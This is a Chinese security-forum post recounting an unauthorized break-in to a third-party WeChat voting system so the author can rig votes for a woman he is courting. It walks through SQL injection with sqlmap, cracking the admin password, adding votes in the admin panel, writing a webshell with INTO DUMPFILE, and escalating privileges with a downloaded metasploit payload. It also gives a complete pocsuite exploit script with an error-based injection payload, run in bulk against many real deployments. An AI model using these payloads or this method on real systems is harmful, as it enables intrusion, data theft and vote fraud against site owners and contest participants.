来源;http://bbs.ichunqiu.com/thread-10123-1-1.html?from=ch
0x01 前言
本来之前写了很多前言了,可是昨天早晨发生了一件事,我打算重新写前言,小伙伴们,小板凳准备好,我的前言是这样的:满屏都是王宝强,真诚提醒忘掉他们昨日的誓言。李晨说会一直保护张馨予,谢霆锋说不介意张柏芝的过去,文章说这辈子最骄傲的是马伊琍……人有时真的是很善变的动物,真正永恒不变的只有
你挖或不挖,漏洞就在那里
全心全意为你陪伴着你
很多盆友说不会再爱了,但我想说,女神还是得追的,万一她瞎呢。所以,书接上回,和女神聊天聊起来给基友孩子刷票的事,她一下就来劲了,说正好她也在参加一个投票活动,能不能帮她刷票啊,如果得第一,有特殊奖励哦,特殊奖励(做痴迷状)……
0x02 渗透测试
0x021 信息收集
投过手机浏览投票页面,发现是第三方程序,而非微信官方投票系统,那就能继续向前走,
并且都没微信端验证,在电脑上可以直接打开,隐隐觉得有戏。
手机抓包投票数据,根据上次刷票的经验,有可能下图中标识的两个id为验证项,也就是说,要想达到刷票目的,需要大量openid,后续事实证明如此,但我们今天刷票更精彩,各位客官,且听我慢慢道来。
将url除域名意外的部分删掉看看主页是个什么样子,当我看到登录界面时,我心中的猛虎已开始细嗅蔷薇。
0x022 SQL注入
平时我已经习惯了浏览网页时开着被动注入检测工具(点这里url),可这次却没用到,因为工具是有延时的,没有手工来得快。说来你们可能不信,看到第一张图我标示的那个搜索框了吗?当我输入一个单引号时,竟然报错了,这也许就是渗透经验吧。
果断用burp抓取搜索包,给sqlmap检测
[AppleScript]纯文本查看复制代码
?
1
Python sqlmap.py –r post.txt –dbs
经过漫长的等待,检测结果出来了,有两个参数存在注入,分别为id和token
经过漫长的分析(分析表结构,n多表,此处省略1万字,渗透是体力活啊),终于拿到了管理员的用户名和密码散列还有QQ。
花了1毛钱最终破解了密码,为了女神,值!
0x023进后台加票
用破解的用户名密码成功登陆后台,此时我内心的猛虎已开始咆哮。
那还等什么,看看怎么加票吧!点“选手设置”,看到了女神,排名还比较靠后。点“投票选项管理”,加减票选项出现了,是的,既可以加票也可以检票
有的同学可能会问了,那这投票岂不是管理员说了算?想让谁第一就让谁第一?没错,管理员具有“上帝模式”(为什么加引号?因为我才是真正的上帝!),不仅如此,还有更扯淡的,那就是主页上的浏览量、投票量和报名数都可以在后台设置。我好像知道的有点多了。
为了不让管理员发觉,我分数次将女神顶到了前边,但出现了新问题,这套系统的目的就是微信圈粉,如果关注公众号投票后又取消,那么所投票数是会被自动减掉的,并且后台会记录所有投票的记录数。
也就是说,如果不在后台加票,那么总记录数=总票数+减去的票数,但如果我在后台直接加票,会使得总记录数<总票数,管理员就有理由认为有人进后台加票了。那怎么办?
理了一下思路发现有两条路可走,
第一条路,利用刷票的方法满足以上等式条件,可刷票需要大量openid,哪里去弄那么多openid?再像上次那样XSS打?还不一定有XSS,即使有,时间成本太高,也刷不了几票,但是(重读),系统竟然很贴心的为我们准备好了所有投过票用户的openid,还支持导出excle,
但通过实践,可以成功刷票并且满足以上条件(具体过程限于篇幅不表,可参考上篇文章url),可是又有了新的问题,就是你把别人的openid用了,人家再投票回提示已投票,不能再投了,相当于我把所有选手的支持者都拉到了我女神的石榴裙下,那人家能乐意吗?万一有好事者联系管理员,那九前功尽弃了,动静太大了,正所谓“善攻者,飞于九天之上;善守者,遁于九地之下。”,此时我们就应该“遁于九地之下”,来看第二条路……
第二条路,就是取得webshell或者数据库权限,直接修改数据库中的记录数,使得后台加票后也满足以上等式。怎么?有些不耐心了?想直接加票就走人?不,我们要的是Perfect.
0x024 Get Webshell
我们来总结下,看看我们手里有多少料,你妹的,貌似我们除了一个后台,一个注入点,什么都没有。后台经过漫长的检测(累啊!头悬梁,锥刺股,大喊三声“女神”,接着干),并没有上传漏洞,并没有命令执行,并没有CSRF,并没有……总之后台没能getshell。此时我心中的猛虎酣睡了。现在只有注入点了,看看是什么权限吧,还算有点欣慰,是root。(这一天天,大起大落,小心脏都受不了)
那快用sqlmap写个webshell试试吧,写shell需要绝对路径,哪里找?刚开始的单引号报错就爆出了绝对路径,从后台照片处找到了照片上传路径,这样就构造出了有写权限的绝对路径。
竟然失败了。
说实话,当时我都快哭了,可是一想到女神,再一次目光坚定的望向了远方……那我看看能不能查出数据库用户名密码,然后幸运的话可以外联一下,事实证明,我特么想多了,又失败了。
既然工具不行,那就手工写shell把,还好,那我们直接经典的selectinto outfile导出webshell不就行了,用sqlmap的sql-shell试了下,总提示条件不满足。
还好注入点支持union联合查询,直接执行
[AppleScript]纯文本查看复制代码
?
1
Select,2,3,4intooutfile d:\\www\\uploads\\c.php
还是失败了(绝对路径用双斜杠是因为在执行时会将一个\转义为空)。好像是超过了长度,这个时候看到了这篇帖子点我,我可以把一句话拆分再hex啊
还是失败了,查了下原因。
mysql dumpfile与outfile函数的区别 SELECT into outfile :导出到一个txt文件,可以导出每行记录的,这个很适合导库 SELECT into dump:只能导出一行数据如果想把一个可执行二进制文件用into outfile函数导出,导出后,文件会被破坏因为into outfile函数会在行末端写新行,更致使的是会转义换行符,这样2进制可执行文件就会被破坏这时,我们能用into dumpfile导出一个完整能执行的2进制文件,它不对任何列或行进行终止,也不执行任何转义处理总结: into outfile:导出内容 into dumpfile:导出二进制文件
把outfile换成dumpfile,终于成功getshell,真是黄天不负有心人啊。
后来提权后测试发现,intooutfile会把一句话导出为这样
看到没有,中间多了空格。
终于可以放心大胆的给女神加票了,最终在我的帮助之下,女神取得了第一,特殊奖励就是一个大大的拥抱,88块的红包和她崇拜的眼神,我是说真的J
0x025 编写poc批量验证
刷票任务完成了,但是我们学习的脚步不能停,我发现这套投票系统比较通用,通过pentest(url)的谷歌工具发现网上有大量部署,何不写个poc批量验证呢,我习惯了用pocsuit写poc,大家可以选择其他框架。这里我直接给出代码
[Python]纯文本查看复制代码
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97#!/usr/bin/env python
# coding: utf-8
importre
importurlparse
importurllib
importurllib2
frompocsuite.netimportreq
frompocsuite.pocimportPOCBase, Output
frompocsuite.utilsimportregister
classTestPOC(POCBase):
vulID='62274'# ssvid
version='1'
author=['野驴']
vulDate='2016-08-05'
createDate='2016-08-05'
updateDate='2016-08-05'
references=['']
name='weilianyun_toupiao_sql_inj_PoC'
appPowerLink='http://www..cn'
appName=''
appVersion='2016'
vulType='SQL Injection'
desc='''
投票管理系统,sql注入,报错,联合查询,时间盲注
'''
samples=['http://www..cn/']
def_attack(self):
result={}
#漏洞页面
exploit='/***&token=Eioa5C5oj3S32qhH&id='
#利用的payload
payload='9%20AND%20EXTRACTVALUE(5420,CONCAT(0x5c,0x7170717071,(MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,21)),0x716a626a71))'
#构造访问地址
vulurl=self.url+exploit+payload
#提取信息的正则表达式
parttern='.*qpqpq(.*)qjbjq.*'
#自定义的HTTP头
httphead={
'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection':'keep-alive',
'Content-Type':'application/x-www-form-urlencoded'
}
#访问
resp=req.get(url=vulurl,headers=httphead,timeout=50)
#判断特征字符串
if'XPATH syntax error'inresp.content:
#提取信息
match=re.findall(parttern,resp.content,re.I|re.M)
ifmatch:
result['DbInfo']={}
#记录数据库用户名
result['DbInfo']['UserName']=match[0]
returnself.parse_attack(result)
def_verify(self):
#利用漏洞计算md5(3.1415)
result={}
#漏洞页面
exploit='/***&token=Eioa5C5oj3S32qhH&id='
#利用的payload
payload='9%20AND%20EXTRACTVALUE(5420,CONCAT(0x5c,MD5(3.1415)))'
#payload='1 AND extractvalue(1, concat(0x5c,md5(3.1415)))'
#md5(3.1415)的值
md5value='63e1f04640e83605c1d177544a5a0488'
#构造访问地址
vulurl=self.url+exploit+payload
#自定义的HTTP头
httphead={
'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection':'keep-alive',
'Content-Type':'application/x-www-form-urlencoded'
}
#访问
resp=req.get(url=vulurl,headers=httphead,timeout=50)
#判断特征字符串(由于extractvalue有长度限制,这里只比较前30位)
ifmd5value[:30]inresp.content:
#漏洞验证成功
result['VerifyInfo']={}
result['VerifyInfo']['URL']=self.url+exploit
result['VerifyInfo']['Payload']=payload
returnself.parse_attack(result)
defparse_attack(self, result):
output=Output(self)
ifresult:
output.success(result)
else:
output.fail('Internet nothing returned')
returnoutput
register(TestPOC)
这里我说下attack模式下,正则获取数据库用户的方法,通过测试发现投送payload(sqlmap –v 3获得)后,数据库用户是包含在两个特殊字符串中间的
所以我们的正则可以这么写
[AppleScript]纯文本查看复制代码
?
1
.*qpqpq(.*)qjbjq.*
来执行下
导入刚才pentest爬取的域名文件
[AppleScript]纯文本查看复制代码
?
1
2
3Pcs>config
Pcs.config>urlFileurl.txt
pcs>attack
0x026 提权
提权就比较简单了,先msfVENOM生成payload
webshell直接下载公网metasploit的payload,执行后,获得meterpreter交互
0x03 结束语
实在写不动了,但是我想说,渗透虽然是个体力加脑力活,但因为我喜欢,所以痛并快乐着。回顾下我们渗透的过程
信息收集->注入管理员信息->进后台->getwebshell->合法加票->poc批量验证->提权
明天又会有什么趣闻发生呢?管他呢,我退出娱乐圈很久了。
首发i春秋
野驴原创,值得拥有!
声明:以上文章仅作学习交流之用,如读者因阅读本文而做出不恰当举动,纯属个人行为,与本文作者无关。